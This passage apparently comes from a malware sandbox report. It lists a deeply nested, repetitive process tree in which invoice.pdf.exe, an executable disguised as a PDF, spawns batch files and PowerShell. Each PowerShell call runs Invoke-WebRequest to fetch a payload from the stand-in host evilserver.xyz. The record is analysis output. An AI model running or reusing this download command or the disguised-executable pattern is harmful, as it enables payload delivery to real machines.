        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        131⤵
        
        PID:1440
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        131⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3520
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DD7.tmp\7DE8.tmp\7DF8.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        132⤵
        
        PID:3476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        133⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        133⤵
        
        PID:3592
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\822B.tmp\822C.tmp\822D.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        134⤵
        
        PID:3352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        135⤵
        
        PID:3704
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        135⤵
        
        PID:4060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8546.tmp\8547.tmp\8567.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        136⤵
        
        PID:1440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        137⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        137⤵
        
        PID:3196
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\89A9.tmp\89BA.tmp\89CB.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        138⤵
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        139⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        139⤵
        
        PID:3336
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F93.tmp\8F94.tmp\8F95.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        140⤵
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        141⤵
        
        PID:3588
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        141⤵
        
        PID:3716
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\933B.tmp\933C.tmp\933D.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        142⤵
        
        PID:3872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        143⤵
        
        PID:3448
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        143⤵
        
        PID:3824
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9849.tmp\986A.tmp\987A.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        144⤵
        
        PID:3660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        145⤵
        
        PID:3588
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        145⤵
        
        PID:2528
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C11.tmp\9C12.tmp\9C13.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        146⤵
        
        PID:3580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        147⤵
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        147⤵
        
        PID:4168
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1CB.tmp\A1DC.tmp\A1DD.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        148⤵
        
        PID:4188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        149⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        149⤵
        
        PID:4304
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A9D6.tmp\A9D7.tmp\A9D8.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        150⤵
        
        PID:4324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        151⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        151⤵
        
        PID:4436
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B01D.tmp\B02E.tmp\B02F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        152⤵
        
        PID:4456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        153⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        153⤵
        
        PID:4572
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B57A.tmp\B57B.tmp\B57C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        154⤵
        
        PID:4592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        155⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        155⤵
        
        PID:4712
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B8F3.tmp\B8F4.tmp\B8F5.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        156⤵
        
        PID:4732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        157⤵
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        157⤵
        
        PID:4852
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C043.tmp\C044.tmp\C045.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        158⤵
        
        PID:4872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        159⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        159⤵
        
        PID:4988
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C3AD.tmp\C3AE.tmp\C3AF.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        160⤵
        
        PID:5008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        161⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        161⤵
        
        PID:4116
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C8FA.tmp\C8FB.tmp\C8FC.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        162⤵
        
        PID:2144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        163⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        163⤵
        
        PID:1516
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CD7C.tmp\CD7D.tmp\CD7E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        164⤵
        
        PID:1404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        165⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        165⤵
        
        PID:4372
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D1D0.tmp\D1D1.tmp\D1D2.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        166⤵
        
        PID:4356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        167⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        167⤵
        
        PID:4584
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DC7A.tmp\DC7B.tmp\DC7C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        168⤵
        
        PID:4660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        169⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        169⤵
        
        PID:4800
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DF86.tmp\DF87.tmp\DF88.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        170⤵
        
        PID:4820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        171⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        171⤵
        
        PID:4976
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E4E3.tmp\E4E4.tmp\E4E5.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        172⤵
        
        PID:4984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        173⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        173⤵
        
        PID:4108
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E936.tmp\E937.tmp\E938.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        174⤵
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        175⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        175⤵
        
        PID:4180
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED4C.tmp\ED4D.tmp\ED4E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        176⤵
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        177⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        177⤵
        
        PID:4552
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F180.tmp\F181.tmp\F182.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        178⤵
        
        PID:4568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        179⤵
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        179⤵
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F5A5.tmp\F5A6.tmp\F5A7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        180⤵
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        181⤵
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        181⤵
        
        PID:4864
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F9CA.tmp\F9CB.tmp\F9CC.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        182⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        183⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        183⤵
        
        PID:4900
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FDDF.tmp\FDE0.tmp\FDE1.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        184⤵
        
        PID:5056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        185⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        185⤵
        
        PID:4248
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\242.tmp\243.tmp\244.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        186⤵
        
        PID:4164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        187⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        187⤵
        
        PID:4420
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\657.tmp\668.tmp\669.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        188⤵
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        189⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        189⤵
        
        PID:2568
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6C.tmp\A6D.tmp\A6E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        190⤵
        
        PID:4804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        191⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        191⤵
        
        PID:5064
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E43.tmp\E44.tmp\E45.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        192⤵
        
        PID:4936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        193⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        193⤵
        
        PID:4968
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1249.tmp\124A.tmp\124B.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        194⤵
        
        PID:4044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        195⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        195⤵
        
        PID:4560
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\165E.tmp\166F.tmp\1670.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        196⤵
        
        PID:2204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        197⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        197⤵
        
        PID:4796
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1AD1.tmp\1AD2.tmp\1AD3.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        198⤵
        
        PID:4848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        199⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        199⤵
        
        PID:4100
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1F34.tmp\1F35.tmp\1F36.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        200⤵
        
        PID:5068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        201⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        201⤵
        
        PID:1232
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\22FB.tmp\22FC.tmp\22FD.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        202⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        203⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        203⤵
        
        PID:2148
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2701.tmp\2702.tmp\2703.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        204⤵
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        205⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        205⤵
        
        PID:5060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AF7.tmp\2AF8.tmp\2AF9.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        206⤵
        
        PID:4940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        207⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        207⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2F1C.tmp\2F1D.tmp\2F1E.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        208⤵
        
        PID:2180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        209⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        209⤵
        
        PID:2580
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\336F.tmp\3370.tmp\3371.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        210⤵
        
        PID:2160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        211⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        211⤵
        
        PID:1800
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37B3.tmp\37B4.tmp\37C5.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        212⤵
        
        PID:4492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        213⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        213⤵
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3A42.tmp\3A43.tmp\3A44.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        214⤵
        
        PID:108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        215⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        215⤵
        
        PID:2744
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F80.tmp\3F81.tmp\3F82.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        216⤵
        
        PID:4920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        217⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        217⤵
        
        PID:5020
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\43A5.tmp\43B5.tmp\43B6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        218⤵
        
        PID:5076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        219⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        219⤵
        
        PID:5096
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4837.tmp\4838.tmp\4839.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        220⤵
        
        PID:3808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        221⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        221⤵
        
        PID:4972
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4C6B.tmp\4C6C.tmp\4C6D.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        222⤵
        
        PID:4084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        223⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        223⤵
        
        PID:3248
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\50C1.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        224⤵
        
        PID:3784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        225⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        225⤵
        
        PID:4696
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\54A5.tmp\54A6.tmp\54A7.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        226⤵
        
        PID:2708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        227⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe
        
        invoice.pdf
        227⤵
        
        PID:5188
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\58CA.tmp\58DB.tmp\58DC.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"
        228⤵
        
        PID:5208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"
        229⤵
        
        PID:5236
        
